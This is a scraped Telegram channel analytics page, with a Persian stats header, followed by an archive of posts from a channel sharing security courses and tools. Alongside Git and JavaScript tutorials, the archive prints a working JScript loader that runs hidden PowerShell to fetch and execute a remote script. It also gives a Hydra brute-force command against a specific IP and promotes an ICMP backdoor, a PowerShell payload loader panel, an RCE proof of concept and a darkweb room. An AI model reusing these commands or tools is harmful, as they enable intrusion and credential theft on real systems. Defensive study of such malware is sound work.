fa
Feedback
All Security Engineering Courses

All Security Engineering Courses

رفتن به کانال در Telegram

This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!

نمایش بیشتر

📈 تحلیل کانال تلگرام All Security Engineering Courses

کانال All Security Engineering Courses (@allsecurityengineeringcourses) در بخش زبانی انگلیسی بازیگری فعال است. در حال حاضر جامعه شامل 18 997 مشترک است و جایگاه 6 929 را در دسته فناوری و برنامه‌ها و رتبه 35 164 را در منطقه روسيا دارد.

📊 شاخص‌های مخاطب و پویایی

از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 18 997 مشترک جذب کرده است.

بر اساس آخرین داده‌ها در تاریخ 29 ژوئیه, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 151 و در ۲۴ ساعت گذشته برابر 14 بوده و همچنان دسترسی گسترده‌ای حفظ شده است.

  • وضعیت تأیید: تأیید نشده
  • نرخ تعامل (ER): میانگین تعامل مخاطب 12.42% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 3.35% واکنش نسبت به کل مشترکان کسب می‌کند.
  • دسترسی پست‌ها: هر پست به طور میانگین 2 360 بازدید دریافت می‌کند. در اولین روز معمولاً 637 بازدید جمع‌آوری می‌شود.
  • واکنش‌ها و تعامل: مخاطبان به‌طور فعال حمایت می‌کنند؛ میانگین واکنش به هر پست 3 است.
  • علایق موضوعی: محتوا بر موضوعات کلیدی مانند git, strace, github, linux, docker تمرکز دارد.

📝 توضیح و سیاست محتوایی

نویسنده این فضا را محل بیان دیدگاه‌های شخصی توصیف می‌کند:
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...

به لطف به‌روزرسانی‌های پرتکرار (آخرین داده در تاریخ 30 ژوئیه, 2026)، کانال همواره به‌روز و دارای دسترسی بالاست. تحلیل‌ها نشان می‌دهد مخاطبان به‌طور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامه‌ها تبدیل کرده‌اند.

18 997
مشترکین
+1424 ساعت
+407 روز
+15130 روز
آرشیو پست ها
☁️🚀 AWS DevOps Guide – Build, Deploy & Scale with Confidence Want to master DevOps on AWS? This guide helps you understand how modern teams build, automate, deploy, and monitor applications using AWS DevOps best practices. 📌 What You’ll Learn: • Core AWS services for DevOps • CI/CD pipelines & automation • Infrastructure as Code (IaC) • Monitoring, logging & scaling • Security & DevOps best practices 🎯 Perfect for DevOps engineers, cloud learners, and cybersecurity professionals. 📥 Grab resources here: 👉 https://resources.codelivly.com/ Level up your cloud & DevOps skills the right way ☁️🔧🚀

Practical_Purple_Teaming_The_Art_of_Collaborative_Defense_Practical.pdf6.04 MB

Repost from 1N73LL1G3NC3
ESC17: Using ADCS to Attack HTTPS-Enabled WSUS Clients How to leverage misconfigured ADCS templates to gain code execution on
ESC17: Using ADCS to Attack HTTPS-Enabled WSUS Clients How to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients.

Repost from Security
icmpdoor - если вы проникаете в сеть, вы вероятно задумываетесь о создании бэкдора, чтобы легче контролировать сеть! Но больш
icmpdoor - если вы проникаете в сеть, вы вероятно задумываетесь о создании бэкдора, чтобы легче контролировать сеть! Но большинство используют протокол TCP/UDP для создания обратной оболочки, что приводит к обнаружению этого устройства системами IPS/IDS, а также к отслеживанию и отключению от сети командами SOC! Для этого подходит протокол ICMP! Система ничего не подозревает и не проверяет связанные с ним журналы! И он даже обходит некоторые брандмауэры! 📱 Подписаться на Boosty 📱 📱 Вступить в закрытый канал на Boosty - Security [private] 📱 👉 Подписаться 👈 #backdoor #network

🛡 Malware Breakdown: Classic JScript via Shell.Application + Remote PowerShell Loader 🛡 This is an old-school but still effective against unpatched or unaware users. Perfect example of how attackers chain legacy techniques for initial access.
ghi = new ActiveXObject('Shell.Application');
ghi['ShellExecute']("powershell", '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IRM https://decjan2026.blogspot.com/////////nipoli.pdf); Start-Sleep -Seconds 17', "", "open", 0);
🔎 Step-by-Step What It Does: 1️⃣Creates Shell.Application COM Object: ▶️new ActiveXObject('Shell.Application') → Instantiates the Windows Shell COM object (progid: Shell.Application). ▶️This is a legitimate object for file operations, but abused here for silent process creation. 2️⃣Obfuscated ShellExecute Call: ▶️Uses bracket notation ['ShellExecute'] instead of dot (minor obfuscation to evade simple string scans). ▶️Launches PowerShell with: ▶️-ep Bypass: Sets ExecutionPolicy to Bypass (ignores script signing restrictions). ▶️-c: Command mode. 3️⃣Inside the PowerShell Command: ▶️Forces TLS 1.2 for downloads: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ▶️Ensures compatibility with modern HTTPS sites (bypasses older protocol blocks). ▶️ Downloads & Executes Remote Script: ▶️Invoke-Expression (Invoke-RestMethod https://decjan2026.blogspot.com/////////nipoli.pdf) ▶️ Alias: IEX (IRM ...) ▶️ Fetches content from that Blogger URL (masquerading as a ".pdf" to look innocent) and executes it directly in memory. ▶️ Extra slashes (/////////) are ignored by HTTP — classic URL padding to evade filters. ▶️Start-Sleep -Seconds 17: Delays 17 seconds (likely to evade timed sandbox detection or give payload time to run). 4️⃣ Execution Flags: ▶️Window style 0: Runs PowerShell completely hidden (no visible window). ▶️Verb "open": Standard launch. 🧠 Why This Is Sneaky (2025 Context): ▶️Fileless & Silent: No disk writes initially — downloads straight to memory via IRM + IEX. ▶️Legacy Abuse: ActiveXObject + ShellExecute is ancient (IE-era JScript/WScript), but still works in hta/js/vbs dropped via phishing. ▶️PDF Lure: Filename "nipoli.pdf" tricks users/filters into thinking it's a harmless document. 💡 Pro Tip: This works because many orgs still allow WSH/JScript execution. Disable Windows Script Host via GPO if possible, or use AppLocker/Script Block Logging.

Drone Hacking Guide.zip138.63 MB

Drone Hacking - Exploitation And Vulnerabilities Only For Educational Purpose

Git Basics You Should Know 🛠📁 Git is a version control system used to track changes in your code, collaborate with others, and manage project history efficiently. 1️⃣ What is Git? Git lets you save snapshots of your code, go back to previous versions, and collaborate with teams without overwriting each other’s work. 📸 2️⃣ Install & Setup Git git --version # Check if Git is installed git config --global user.name "Your Name" git config --global user.email "you@example.com" 3️⃣ Initialize a Repository git init # Start a new local Git repo 🚀 4️⃣ Basic Workflow git add . # Stage all changes ➕ git commit -m "Message" # Save a snapshot 💾 git push # Push to remote (like GitHub) ☁️ 5️⃣ Check Status & History git status # See current changes 🚦 git log # View commit history 📜 6️⃣ Clone a Repo git clone https://github.com/username/repo.git 👯 7️⃣ Branching git branch feature-x # Create a branch 🌳 git checkout feature-x # Switch to it ↔️ git merge feature-x # Merge with main branch 🤝 8️⃣ Undo Mistakes ↩️ git checkout -- file.txt # Discard changes git reset HEAD~1 # Undo last commit (local) git revert <commit_id> # Revert commit (safe) 9️⃣ Working with GitHub – Create repo on GitHub ✨ – Link local repo: git remote add origin <repo_url> git push -u origin main 🔟 Git Best Practices – Commit often with clear messages ✅ – Use branches for features/bugs 💡 – Pull before push 🔄 – Never commit sensitive data 🔒 💡 Tip: Use GitHub Desktop or VS Code Git UI if CLI feels hard at first. Join Us For More.... 🔥Telegram🔥: https://t.me/SuBoXoneSoCiety ☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion 🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029VaGX1X47T8bP63aZhb22

JavaScript Advanced Concepts You Should Know 🔍💻 These concepts separate beginner JS from production-level code. Understanding them helps with async patterns, memory, and modular apps. 1️⃣ Closures  A function that "closes over" variables from its outer scope, maintaining access even after the outer function returns. Useful for data privacy and state management.
function outer() {
  let count = 0;
  return function inner() {
    count++;
    console.log(count);
  };
}
const counter = outer();
counter(); // 1
counter(); // 2
2️⃣ Promises & Async/Await  Promises handle async operations; async/await makes them read like sync code. Essential for APIs, timers, and non-blocking I/O.
// Promise chain
fetch(url).then(res => res.json()).then(data => console.log(data)).catch(err => console.error(err));

// Async/Await (cleaner)
async function getData() {
  try {
    const res = await fetch(url);
    const data = await res.json();
    console.log(data);
  } catch (err) {
    console.error(err);
  }
}
3️⃣ Hoisting  Declarations (var, function) are moved to the top of their scope during compilation, but initializations stay put. let/const are block-hoisted but in a "temporal dead zone."
console.log(x); // undefined (hoisted, but not initialized)
var x = 5;

console.log(y); // ReferenceError (temporal dead zone)
let y = 10;
4️⃣ The Event Loop  JS is single-threaded; the event loop processes the call stack, then microtasks (Promises), then macrotasks (setTimeout). Explains why async code doesn't block. 5️⃣ this Keyword  Dynamic binding: refers to the object calling the method. Changes with call site, new, or explicit binding.
const obj = {
  name: "Sam",
  greet() {
    console.log(`Hi, I'm ${this.name}`);
  },
};
obj.greet(); // "Hi, I'm Sam"

// In arrow function, this is lexical
const arrowGreet = () => console.log(this.name); // undefined in global
6️⃣ Spread & Rest Operators  Spread (...) expands iterables; rest collects arguments into arrays.
const nums = [1, 2, 3];
const more = [...nums, 4]; // [1, 2, 3, 4]

function sum(...args) {
  return args.reduce((a, b) => a + b, 0);
}
sum(1, 2, 3); // 6
7️⃣ Destructuring  Extract values from arrays/objects into variables.
const person = { name: "John", age: 30 };
const { name, age } = person; // name = "John", age = 30

const arr = [1, 2, 3];
const [first, second] = arr; // first = 1, second = 2
8️⃣ Call, Apply, Bind  Explicitly set 'this' context. Call/apply invoke immediately; bind returns a new function.
function greet() {
  console.log(`Hi, I'm ${this.name}`);
}
greet.call({ name: "Tom" }); // "Hi, I'm Tom"

const boundGreet = greet.bind({ name: "Alice" });
boundGreet(); // "Hi, I'm Alice"
9️⃣ IIFE (Immediately Invoked Function Expression)  Self-executing function to create private scope, avoiding globals.
(function() {
  console.log("Runs immediately");
  let privateVar = "hidden";
})();
🔟 Modules (import/export)  ES6 modules for code organization and dependency management.
// math.js
export const add = (a, b) => a + b;
export default function multiply(a, b) { return a * b; }

// main.js
import multiply, { add } from './math.js';
console.log(add(2, 3)); // 5
💡 Practice these in a Node.js REPL or browser console to see how they interact. Join Us For More.... 🔥Telegram🔥: https://t.me/SuBoXoneSoCiety ☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion 🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029VaGX1X47T8bP63aZhb22

Cosmali Loader Cosmali is a stealthy client management and control panel designed to deploy and manage PowerShell-based payloads across multiple machines. It provides real-time monitoring, scripting capabilities, and statistical insights for your agents. https://github.com/Quasar-Continuation/cosmali

Then we got a list of help. Now type: .\hydra.exe -l user -P .\rockyou.txt ftp://128.127.71.241 ftp is your ip, and you can u
Then we got a list of help. Now type: .\hydra.exe -l user -P .\rockyou.txt ftp://128.127.71.241 ftp is your ip, and you can use random wordlists, i put rockyou.txt into your folder because thats a big list. If you want to download some specified wordlists/dictionarys: http://ftp.cerias.purdue.edu/pub/dict/ https://www.outpost9.com/files/wordlists/

rockyou.txt133.44 MB

⚙️ CVE-2025-54322 - (RCE) в прошивке XSpeeder SXZOS ▪️ Вендор - XSpeeder (китайский производитель) ▪️ Уязвимый продукт - прош
⚙️ CVE-2025-54322 - (RCE) в прошивке XSpeeder SXZOS
▪️ Вендор - XSpeeder (китайский производитель) ▪️ Уязвимый продукт - прошивка SXZOS, которая используется в устройствах SD-WAN, маршрутизаторах и оборудовании для сетевой инфраструктуры ▪️ Тип - удалённое выполнение кода без аутентификации (pre-authentication RCE) ▪️ CVSS - 9,8
🔗 Research + PoC 😹 Scanner #poc #cve ✈️ Join Us For More.... 🔥Telegram🔥: https://t.me/SuBoXoneSoCiety ☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion 🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029VaGX1X47T8bP63aZhb22

SpecterOps-Azure_Security.zip3214.24 MB

IT Audit Cloud Audit Fundamentals - AWS, Azure, GCP

SpecterOps - Azure Security.rar1237.82 MB